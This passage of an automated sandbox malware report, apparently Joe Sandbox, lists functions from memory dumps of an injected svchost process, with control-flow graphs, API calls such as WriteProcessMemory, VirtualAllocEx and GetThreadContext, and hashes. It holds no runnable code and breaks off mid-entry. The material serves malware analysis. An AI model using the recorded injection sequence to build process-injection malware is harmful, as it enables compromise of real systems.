                                control_flow_graph 174 87868b0-87868c5 call 878579c 178 87868db-87868df 174->178 179 87868c7 174->179 180 87868e1-87868eb 178->180 181 87868f3-8786934 178->181 230 87868cd call 8786b38 179->230 231 87868cd call 8786b29 179->231 180->181 186 8786941-878694f 181->186 187 8786936-878693e 181->187 182 87868d3-87868d5 182->178 183 8786a10-8786ad0 182->183 223 8786ad8-8786b03 GetModuleHandleW 183->223 224 8786ad2-8786ad5 183->224 188 8786951-8786956 186->188 189 8786973-8786975 186->189 187->186 191 8786958-878695f call 87857a8 188->191 192 8786961 188->192 193 8786978-878697f 189->193 196 8786963-8786971 191->196 192->196 197 878698c-8786993 193->197 198 8786981-8786989 193->198 196->193 200 87869a0-87869a9 call 8780d2c 197->200 201 8786995-878699d 197->201 198->197 206 87869ab-87869b3 200->206 207 87869b6-87869bb 200->207 201->200 206->207 208 87869d9-87869dd 207->208 209 87869bd-87869c4 207->209 228 87869e0 call 8786df8 208->228 229 87869e0 call 8786de8 208->229 209->208 210 87869c6-87869d6 call 87855e8 call 87857b8 209->210 210->208 213 87869e3-87869e6 216 87869e8-8786a06 213->216 217 8786a09-8786a0f 213->217 216->217 225 8786b0c-8786b20 223->225 226 8786b05-8786b0b 223->226 224->223 226->225 228->213 229->213 230->182 231->182
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: Ea`
                                • API String ID: 4139908857-4245709379
                                • Opcode ID: dfeaf3a73827820151ba34497c92f84a6c74ced6e2297ef4628a5aa30442c088
                                • Instruction ID: 9f5525e4dfbd496612a52737652c50ac12dd7f25f4b11cecd509da9d3e97b427
                                • Opcode Fuzzy Hash: dfeaf3a73827820151ba34497c92f84a6c74ced6e2297ef4628a5aa30442c088
                                • Instruction Fuzzy Hash: 79714570A00B05DFD764EF2AD04875ABBF1BF98205F14892ED18AD7B44DB75E8068BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08788374, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 232 8788374-878b33c 235 878b3ec-878b40c call 878824c 232->235 236 878b342-878b347 232->236 243 878b40f-878b41c 235->243 238 878b349-878b380 236->238 239 878b39a-878b3d2 CallWindowProcW 236->239 246 878b389-878b398 238->246 247 878b382-878b388 238->247 240 878b3db-878b3ea 239->240 241 878b3d4-878b3da 239->241 240->243 241->240 246->243 247->246
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0878B3C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID: Ea`
                                • API String ID: 2714655100-4245709379
                                • Opcode ID: 52ed3761ffe2c563c0e8d2e278b2a647836cf257862a6e97a22a52a189d093a9
                                • Instruction ID: 2df1e41744ae5a9f030e5249d074df03f18e5c4f638977b0aea5b1b2dc650466
                                • Opcode Fuzzy Hash: 52ed3761ffe2c563c0e8d2e278b2a647836cf257862a6e97a22a52a189d093a9
                                • Instruction Fuzzy Hash: 944157B8A00605CFCB54DF99C488AAABBF5FF88325F24C459D519AB721D774A841CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A6C40, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 249 57a6c40-57a6c96 251 57a6c98-57a6ca4 249->251 252 57a6ca6-57a6ce5 WriteProcessMemory 249->252 251->252 254 57a6cee-57a6d1e 252->254 255 57a6ce7-57a6ced 252->255 255->254
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057A6CD8
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID: Ea`
                                • API String ID: 3559483778-4245709379
                                • Opcode ID: 335810c06ef5db16c80c00adf1a8dddc44ed21c4805bfd628555f422e9083a2e
                                • Instruction ID: 2f720a183fb4cfd0939dadc4563e928b6a2950b70b4c910781a7a10e2db1fb90
                                • Opcode Fuzzy Hash: 335810c06ef5db16c80c00adf1a8dddc44ed21c4805bfd628555f422e9083a2e
                                • Instruction Fuzzy Hash: 35214871D002498FDF40CFA9D884BEEBBF1FF88314F14842AE519A7240C778A955DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A6C48, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 259 57a6c48-57a6c96 261 57a6c98-57a6ca4 259->261 262 57a6ca6-57a6ce5 WriteProcessMemory 259->262 261->262 264 57a6cee-57a6d1e 262->264 265 57a6ce7-57a6ced 262->265 265->264
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057A6CD8
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID: Ea`
                                • API String ID: 3559483778-4245709379
                                • Opcode ID: 9329fdeeb1a636ded02be52e39cff7c2a37059dfc643c32537b3f9194e2856a7
                                • Instruction ID: af0ad1b098266d17d10b8efbcfe965930111940eb4dea413e94e2571bf2a5712
                                • Opcode Fuzzy Hash: 9329fdeeb1a636ded02be52e39cff7c2a37059dfc643c32537b3f9194e2856a7
                                • Instruction Fuzzy Hash: 732148719003099FDB00CFA9C884BDEBBF5FF48314F148429E919A7240CB78A954DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0878009C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 269 878009c-8780544 DuplicateHandle 271 878054d-878056a 269->271 272 8780546-878054c 269->272 272->271
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,08780476,?,?,?,?,?), ref: 08780537
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: Ea`
                                • API String ID: 3793708945-4245709379
                                • Opcode ID: 4d2288494cb968d617863856f2ed1b2544a5e2dcb3840adb98ab4c53b8d0d7f0
                                • Instruction ID: 139dc2cf37e19284ebb1a3c8e486d8bbb0806dcac49f2bb0f65528afdd8129cd
                                • Opcode Fuzzy Hash: 4d2288494cb968d617863856f2ed1b2544a5e2dcb3840adb98ab4c53b8d0d7f0
                                • Instruction Fuzzy Hash: 4E21E6B5904648DFDB10CF99D484BDEBBF4EB48314F14845AE915B3310D778A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A6A89, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 275 57a6a89-57a6adb 277 57a6aeb-57a6b1b GetThreadContext 275->277 278 57a6add-57a6ae9 275->278 280 57a6b1d-57a6b23 277->280 281 57a6b24-57a6b54 277->281 278->277 280->281
                                APIs
                                • GetThreadContext.KERNELBASE(?,00000000), ref: 057A6B0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: ContextThread
                                • String ID: Ea`
                                • API String ID: 1591575202-4245709379
                                • Opcode ID: 1e6da524a233b18354d1eb6a815069bf181675cac0236c354ba2666d0651a84d
                                • Instruction ID: a33703db3b087f5be2c141b8a2c4ff47a9faf070648004433f7d0bdbfa3b6984
                                • Opcode Fuzzy Hash: 1e6da524a233b18354d1eb6a815069bf181675cac0236c354ba2666d0651a84d
                                • Instruction Fuzzy Hash: C32138B1D042098FDB50CFAAD4847EEBBF1AF88314F28842AD419A7740CB789945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 087804A8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 285 87804a8-8780544 DuplicateHandle 286 878054d-878056a 285->286 287 8780546-878054c 285->287 287->286
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,08780476,?,?,?,?,?), ref: 08780537
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: Ea`
                                • API String ID: 3793708945-4245709379
                                • Opcode ID: 851e6bfb03b4b24d5ba5e6af768a0c6a9dfb02a202c837f2c8c4befecf35ce2f
                                • Instruction ID: d72005848c3d52cb04cf82aa2271ad4329d859097b7aaf5cf2666e039b0b4076
                                • Opcode Fuzzy Hash: 851e6bfb03b4b24d5ba5e6af768a0c6a9dfb02a202c837f2c8c4befecf35ce2f
                                • Instruction Fuzzy Hash: FC2114B5901248DFDB10CFA9D984ADEBFF4EB48320F14801AE914A7311D778A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A6A90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 290 57a6a90-57a6adb 292 57a6aeb-57a6b1b GetThreadContext 290->292 293 57a6add-57a6ae9 290->293 295 57a6b1d-57a6b23 292->295 296 57a6b24-57a6b54 292->296 293->292 295->296
                                APIs
                                • GetThreadContext.KERNELBASE(?,00000000), ref: 057A6B0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: ContextThread
                                • String ID: Ea`
                                • API String ID: 1591575202-4245709379
                                • Opcode ID: 373fafa6a883d9663dfd8abdb58fe1aab279750dd4c85a720e76f9c598ebd106
                                • Instruction ID: 884e641703c6d7e3d41e7c7025c16b9120c238eae83bbefa06aed786be2624c9
                                • Opcode Fuzzy Hash: 373fafa6a883d9663dfd8abdb58fe1aab279750dd4c85a720e76f9c598ebd106
                                • Instruction Fuzzy Hash: BE213871D042088FDB50CFAAC4847EEBBF4EF88314F14842AD519A7640CB78A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08786CF0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 300 8786cf0-8786cf2 301 8786cfc-8786d38 300->301 302 8786cf3-8786cf4 300->302 305 8786d3a-8786d3d 301->305 306 8786d40-8786d6f LoadLibraryExW 301->306 303 8786ced-8786cef 302->303 304 8786cf5-8786cfb 302->304 303->300 304->301 305->306 308 8786d78-8786d95 306->308 309 8786d71-8786d77 306->309 309->308
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,08786B71,00000800,00000000,00000000), ref: 08786D62
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: Ea`
                                • API String ID: 1029625771-4245709379
                                • Opcode ID: 3b3d8f066eaa711de329f83da09585742d64b2ce3dd294560db11c89ab938e46
                                • Instruction ID: f8f628b910ca80ee9dbc71dbcec01d651b7ff458e988fb1fb0832d12dea597fe
                                • Opcode Fuzzy Hash: 3b3d8f066eaa711de329f83da09585742d64b2ce3dd294560db11c89ab938e46
                                • Instruction Fuzzy Hash: F82168B5904248DFCF10DFAAD848ADEFBF4AB58310F14806ED415A7610C7B5A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0878F250, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 312 878f250-878f252 313 878f25c-878f2d8 VirtualProtect 312->313 314 878f254-878f25b 312->314 316 878f2da-878f2e0 313->316 317 878f2e1-878f302 313->317 314->313 316->317
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0878F2CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: Ea`
                                • API String ID: 544645111-4245709379
                                • Opcode ID: 1f9a5aa0e5b1986b5e4890abcd64fa08b0e6859e3c52c81be5b25ab7ee8af658
                                • Instruction ID: 3ad553eddf2449314dfada477ee930fdf10386530e855f2c00427df7dc9ac7b5
                                • Opcode Fuzzy Hash: 1f9a5aa0e5b1986b5e4890abcd64fa08b0e6859e3c52c81be5b25ab7ee8af658
                                • Instruction Fuzzy Hash: 69210675D006099FDB10DF9AD484BDEBBF4EB48320F14842AE868A7641D779A984CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0878F258, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0878F2CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: Ea`
                                • API String ID: 544645111-4245709379
                                • Opcode ID: 011ca8d363bde7dd10490718c6e391f4ae16f4d31a3bca64a892ac3f69c23746
                                • Instruction ID: e97f57a85f024f093636c37f93d19774cf57b8fd12fc1d56b9f96a2ae3f7874d
                                • Opcode Fuzzy Hash: 011ca8d363bde7dd10490718c6e391f4ae16f4d31a3bca64a892ac3f69c23746
                                • Instruction Fuzzy Hash: 4E2126B5D002099FCB10DF9AD484BDEFBF4FB48320F14842AE468A7640D778A984CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 087857E0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 319 87857e0-8786d38 322 8786d3a-8786d3d 319->322 323 8786d40-8786d6f LoadLibraryExW 319->323 322->323 324 8786d78-8786d95 323->324 325 8786d71-8786d77 323->325 325->324
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,08786B71,00000800,00000000,00000000), ref: 08786D62
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: Ea`
                                • API String ID: 1029625771-4245709379
                                • Opcode ID: 4d663c2f2a24228f7934ffea0d36954dee4512c4ec1f1b9469558f8b78c4d8f6
                                • Instruction ID: 965eed8ab29e00108b2c9532e8ec6c9ee49f6c78a36fe31b8668afafd26e19e9
                                • Opcode Fuzzy Hash: 4d663c2f2a24228f7934ffea0d36954dee4512c4ec1f1b9469558f8b78c4d8f6
                                • Instruction Fuzzy Hash: 7F1114B6904209DFCB10DF9AD448BDEFBF4EB58311F14842ED415A7600C775A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A6DE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057A6E5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: Ea`
                                • API String ID: 4275171209-4245709379
                                • Opcode ID: a48f7c1afdc91264a79664591235d6be1189601663a216c5cd93dbe275e89d92
                                • Instruction ID: 77c8b4340574f87cf8ad901192dc9306bf8a27ce9e80e2af3189d4a4becaa91a
                                • Opcode Fuzzy Hash: a48f7c1afdc91264a79664591235d6be1189601663a216c5cd93dbe275e89d92
                                • Instruction Fuzzy Hash: B8116776D042488FCF10CFA9D844BEFBBF1AF88324F28841AE515A7650CB769954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A6DF0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057A6E5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: Ea`
                                • API String ID: 4275171209-4245709379
                                • Opcode ID: 20bd8c6e491d7d89a84fa5e4cc45fb4abc9951f0f5bde5e368ef360da5afb450
                                • Instruction ID: f63d6ee0d7ec8593d1bc4e5f1703e16f3ced282ef41e34d2d7476614213feaa8
                                • Opcode Fuzzy Hash: 20bd8c6e491d7d89a84fa5e4cc45fb4abc9951f0f5bde5e368ef360da5afb450
                                • Instruction Fuzzy Hash: 8A1167728042088FCB10CFAAD844BDFBBF5EF88324F148419E515A7250CB75A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0878579C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,087868C3), ref: 08786AF6
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: Ea`
                                • API String ID: 4139908857-4245709379
                                • Opcode ID: b2244e5f48671a8df16577d76b0aacdc25fe9ed29ea527471e74fa33686acfa6
                                • Instruction ID: f608c284dd82be55a1cf953a9e92d4471f43ef26fb677dba6ea56a63e3f4321e
                                • Opcode Fuzzy Hash: b2244e5f48671a8df16577d76b0aacdc25fe9ed29ea527471e74fa33686acfa6
                                • Instruction Fuzzy Hash: E211F0B1C006499FCB10DF9AD448B9EBBF4EB88224F14842AD429B7600D779A545CFA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A2FF4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 057A79C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: Ea`
                                • API String ID: 410705778-4245709379
                                • Opcode ID: 5b6b7804820694335a0214d04b8aca1d6a0c04780a62f2dc68857ea4aed19bde
                                • Instruction ID: 094e5f4b35b3b3b9c0dfb99edba466abdb0efcd60521101468528d2fcbb53470
                                • Opcode Fuzzy Hash: 5b6b7804820694335a0214d04b8aca1d6a0c04780a62f2dc68857ea4aed19bde
                                • Instruction Fuzzy Hash: 791103B58003489FDB50CF9AD489BDEBFF8EB98724F10851AE515A7700C375A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 057A7960, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 057A79C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: Ea`
                                • API String ID: 410705778-4245709379
                                • Opcode ID: ff1276ee667363f7dc0314915c72192feb9dd606a70f9a7fadd1748d8c50cb3b
                                • Instruction ID: ebf91fe677537d7da8ab47356fe7e3049ac223ac813026dec73e7255bd4bab06
                                • Opcode Fuzzy Hash: ff1276ee667363f7dc0314915c72192feb9dd606a70f9a7fadd1748d8c50cb3b
                                • Instruction Fuzzy Hash: 581106B58002498FDB20CF99D488BDEBBF4EB58324F14891AD425B7740C775A944CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEED00, Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 20c82652bb56f410406fba5de21b9c3d0b303efbb3b528052f65b8a9e5d1b7f7
                                • Instruction ID: 10e47806e5bf3d315a65a7eaab170f353a7be9095fd49d6884d2c66d5201186d
                                • Opcode Fuzzy Hash: 20c82652bb56f410406fba5de21b9c3d0b303efbb3b528052f65b8a9e5d1b7f7
                                • Instruction Fuzzy Hash: CB616634A00A069FCB14CF59D4C08AAFBFAFF88310B55C969C91A9B715DB34F955CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE1528, Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: e92d4b04351208193e48f7ae274e092722071e00ccc7c21556247d3662879d88
                                • Instruction ID: 2d99c25b56fdd689a15d9168e6bf310b20db6ca7364086c68f1af4cdfa1d33d1
                                • Opcode Fuzzy Hash: e92d4b04351208193e48f7ae274e092722071e00ccc7c21556247d3662879d88
                                • Instruction Fuzzy Hash: FE21A031B041198FDB19AB74D0146AEB7F7BB89640F188969D406EB394DF74CD02CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0FD0, Relevance: .4, Instructions: 407COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8cbd28a39818e942642591755b544b6c53c7996fcf23dcc2965423ef0641004a
                                • Instruction ID: 4664cd09795d1992152fb8680ffe1f13123045f92c65df40ba4ef12309eb9603
                                • Opcode Fuzzy Hash: 8cbd28a39818e942642591755b544b6c53c7996fcf23dcc2965423ef0641004a
                                • Instruction Fuzzy Hash: F9F14E75B001049FDB19DF68D844E59BBE2FF88314B19C0A9E60A9B372DB36DC21DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CE0FA8, Relevance: .4, Instructions: 393COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 513c43d16995c61d2baabda1034086a49a46ce5a1c8fce92303e18e38ac21a2e
                                • Instruction ID: 44f56881dfa2a9e176f3b8427e9841263e134892ef8f6013104cbe15121d2a90
                                • Opcode Fuzzy Hash: 513c43d16995c61d2baabda1034086a49a46ce5a1c8fce92303e18e38ac21a2e
                                • Instruction Fuzzy Hash: CCE14C75B001049FCB19DF68D854E59BBE2FF88314B19C0A9E60A9B372DB36DC21DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEAA70, Relevance: .2, Instructions: 230COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b57281a9f8be160ab0916a5d7a5acca0b3bec6355c3b8c29c6a07f5955b3b348
                                • Instruction ID: 210153c7aff19b73252de77afac5d52bebb0b928a7155932cae3a51c1674b5e5
                                • Opcode Fuzzy Hash: b57281a9f8be160ab0916a5d7a5acca0b3bec6355c3b8c29c6a07f5955b3b348
                                • Instruction Fuzzy Hash: 7FA13A746006029FCB58EF24D584959BBF2FF89224755CA98D64ADB371DB30FC85CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEFD70, Relevance: .2, Instructions: 221COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8242dfad4492bef9644d5cba68fcc90cc7f47ab2b494437c228e0c0befd2c0c3
                                • Instruction ID: 2e80486c382830fe866d54c0a77c048f3d9b0611dd3651325b6f3b930b333ade
                                • Opcode Fuzzy Hash: 8242dfad4492bef9644d5cba68fcc90cc7f47ab2b494437c228e0c0befd2c0c3
                                • Instruction Fuzzy Hash: A1617D74B002159FDB18EF66D85866EBBF7FF88600F148429E906D73A4DF398D418BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CEF6A0, Relevance: .2, Instructions: 206COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b319938b82856e6d47742b9ad5db0f68e8f88828c112ff54d2675c968b542842
                                • Instruction ID: 0b6fc07de4ff04e9bed6a7424970983eaf1d32c47eca8ccc8a53bb37de0c578f
                                • Opcode Fuzzy Hash: b319938b82856e6d47742b9ad5db0f68e8f88828c112ff54d2675c968b542842
                                • Instruction Fuzzy Hash: C1718135A081119BAB18EB70F5445AD77E2FF9422071ACA9EC586AF364EF34AD0487E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05CECA48, Relevance: .2, Instructions: 186COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000024.00000002.844390652.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_5ce0000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 86eeb1644def7f50e4e7a01045f07b49fcff1dcba249936795b0c428f7356d32
                                • Instruction ID: 6e218c2ac0c66877cd991b72de9c6031f1ab265580e7eb6253ccc158bd39ed66
                                • Opcode Fuzzy Hash: 86eeb1644def7f50e4e7a01045f07b49fcff1dcba249936795b0c428f7356d32
